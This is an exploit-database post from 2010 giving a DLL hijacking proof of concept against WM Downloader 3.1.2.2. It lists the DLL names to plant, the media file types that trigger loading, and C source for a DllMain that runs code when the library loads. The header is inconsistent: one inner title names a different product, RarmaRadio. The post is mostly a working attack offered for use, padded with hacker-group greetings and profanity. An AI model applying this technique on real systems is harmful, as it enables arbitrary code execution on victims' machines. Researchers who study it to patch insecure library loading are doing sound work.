WM Downloader 3.1.2.2 DLL Hijacking

2010-11-29T00:00:00
ID PACKETSTORM:96180
Type packetstorm
Reporter anT!-Tr0J4n
Modified 2010-11-29T00:00:00

Description

                                        
                                            `========================================================  
WM Downloader 3.1.2.2 DLL Hijacking Exploit  
========================================================  
  
|| || | ||   
o_,_7 _|| . _o_7 _|| 4_|_|| o_w_,  
( : / (_) / ( .  
  
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1  
3 3  
3 _ __ __ ________ __ __ 3  
7 /' \ /'__`\ /'__`\ /\_____ \ /\ \/\ \ 7  
1 /\_, \/\_\L\ \ /\_\L\ \\/___//'/' \_\ \ \ \____ 1  
3 \/_/\ \/_/_\_<_\/_/_\_<_ /' /' /'_` \ \ '__`\ 3  
3 \ \ \/\ \L\ \ /\ \L\ \ /' /' /\ \L\ \ \ \L\ \ 3  
7 \ \_\ \____/ \ \____//\_/ \ \___,_\ \_,__/ 7  
1 \/_/\/___/ \/___/ \// \/__,_ /\/___/ 1  
3 >> Exploit database separated by exploit 3  
3 type (local, remote, DoS, etc.) 3  
7 7  
1 [+] Site : 1337db.com 1  
3 [+] Support e-mail : submit[at]1337db.com 3  
3 3  
7 ############################################## 7  
1 I'm anT!-Tr0J4n 1337 Member from 1337 DataBase 1  
3 ############################################## 3  
3 3   
7-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-7  
  
.....................X-SHADOW ; ThBa7 ; KloofQ8 ; LeGEnD ; abada ...  
.......................................Fuck ALL lamers Top-t34m...................  
.............................../??/)..............(\?`\...... .......  
............................../....//..............\....\...........  
............................./....//................\....\..........  
......................../??/..../??\............/?` ....\?`\.........  
....................././.../..../..../.|_....._|.\....\....\...\.\...  
...................(.(....(....(..../.)..).....(..(.\....)....)....).)  
....................\................\/.../....\...\/................/  
....................\................. /........\................../.  
......................\..............(............)............../...  
........................\.............\.........../............./....  
  
  
#Title: RarmaRadio Version 2.53.1 Bass 2.4 DLL Hijacking Exploit  
  
#Author : anT!-Tr0J4n  
  
#Inj3ct0r Site : http://1337db.com  
  
#Email : D3v-PoinT[at]hotmail[d0t]com & C1EH[at]Hotmail[d0t]com  
  
#Greetz : Dev-PoinT.com ; GlaDiatOr,SILVER STAR , HoBeeZ, Coffin Of Evil  
  
#special thanks : r0073r,Sid3^effects,L0rd CruSad3r,SeeMe,Sonic,gunslinger_,Sn!pEr.S!Te,n4pst3rr,indoushka, KnocKout,SONiC,ZoRLu  
  
#Home : www.Dev-PoinT.com $ http://1337db.com/  
  
#Software : http://www.mini-stream.net/  
  
#Version : 3.1.2.2  
  
#Tested on: Windows XP sp3  
  
  
-----------------------------------  
[+] Compile code as   
+ wdcodec03.dll  
+ wdcodec04.dll  
+ wdcodec05.dll  
+ wdcodec06.dll  
+ wdcodec08.dll  
+ wdcodec09.dll  
+ wdcodec10.dll  
+ wdcodec11.dll  
+ wdcodec12.dll  
+ wdcodec13.dll  
  
[+] Move DLL file to the directory where WM Downloader is installed  
  
  
[+] check the result --> [ Your System 0wn3d BY anT!-Tr0J4n ]  
  
[<<] exploit.m3u  
[<<] exploit.wav  
[<<] exploit.rm  
[<<] exploit.rmvb  
[<<] exploit.wma  
[<<] exploit.asx  
[<<] exploit.mpga  
[<<] exploit.mp3  
[<<] exploit.ogg  
[<<] exploit.cda  
[<<] exploit.flac  
[<<] exploit.fla  
[<<] exploit.pls  
[<<] exploit.smi  
[<<] exploit.wpl  
  
=-=-==-=-=-=-==-=-==-=-=-==-=-=-==-=-=-=-=  
dll (code)  
  
  
*/  
  
#include "stdafx.h"  
  
void init() {  
MessageBox(NULL,"Your System 0wn3d BY anT!-Tr0J4n", "inj3ct0r",0x00000003);  
}  
  
  
BOOL APIENTRY DllMain( HANDLE hModule,  
DWORD ul_reason_for_call,  
LPVOID lpReserved  
)  
{  
switch (ul_reason_for_call)  
{  
case DLL_PROCESS_ATTACH:  
init();break;  
case DLL_THREAD_ATTACH:  
case DLL_THREAD_DETACH:  
case DLL_PROCESS_DETACH:  
break;  
}  
return TRUE;  
`